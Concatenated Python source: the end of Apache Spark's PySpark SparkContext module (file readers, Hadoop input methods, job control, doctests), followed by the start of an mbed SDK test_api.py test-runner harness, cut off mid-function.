>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred, large file is also allowable, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
:param path: path to sequncefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> supress = lock.acquire()
>>> supress = threading.Thread(target=start_job, args=(10,)).start()
>>> supress = threading.Thread(target=stop_job).start()
>>> supress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
test_api.py
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
from __future__ import print_function
import six
import os
import re
import sys
import json
import uuid
import pprint
import random
import argparse
import datetime
import threading
import ctypes
import functools
from colorama import Fore, Back, Style
from prettytable import PrettyTable, HEADER
from copy import copy, deepcopy
from time import sleep, time
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
from os.path import join, exists, basename, relpath, isdir, isfile
from threading import Thread, Lock
from multiprocessing import Pool, cpu_count
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.targets import TARGET_MAP, Target
from tools.config import Config
import tools.test_configs as TestConfig
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import get_config
from tools.resources import Resources, MbedIgnoreSet, IGNORE_FILENAME
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.options import extract_profile
from tools.toolchains import TOOLCHAIN_PATHS
from tools.toolchains import TOOLCHAINS
from tools.test_exporters import ReportExporter, ResultExporterType
from tools.utils import argparse_filestring_type
from tools.utils import argparse_uppercase_type
from tools.utils import argparse_lowercase_type
from tools.utils import argparse_many
from tools.notifier.mock import MockNotifier
from tools.notifier.term import TerminalNotifier
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print(self.single_test.generate_test_summary(test_summary,
shuffle_seed))
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print(self.single_test.generate_test_summary_by_target(
test_summary, shuffle_seed))
print("Completed in %.2f sec"% (elapsed_time))
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_parser=None,
_opts=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_report_text_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_report_text_file_name = _opts_report_text_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_parser = _parser
self.opts = _opts
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print(self.logger.log_line(
self.logger.LogType.NOTIF,
'Skipped tests for %s target. Target platform not found' %
(target)))
continue
clean_mbed_libs_options = (self.opts_goanna_for_mbed_sdk or
self.opts_clean or clean)
profile = extract_profile(self.opts_parser, self.opts, toolchain)
stats_depth = self.opts.stats_depth or 2
try:
build_mbed_libs_result = build_mbed_libs(
T, toolchain,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile,
notify=TerminalNotifier())
if not build_mbed_libs_result:
print(self.logger.log_line(
self.logger.LogType.NOTIF,
'Skipped tests for %s target. Toolchain %s is not '
'supported for this target'% (T.name, toolchain)))
continue
except ToolException:
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building MBED libs for %s using %s'
% (target, toolchain)))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile,
notify=TerminalNotifier())
except ToolException:
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building library %s' % lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move this 2 below loops to separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(
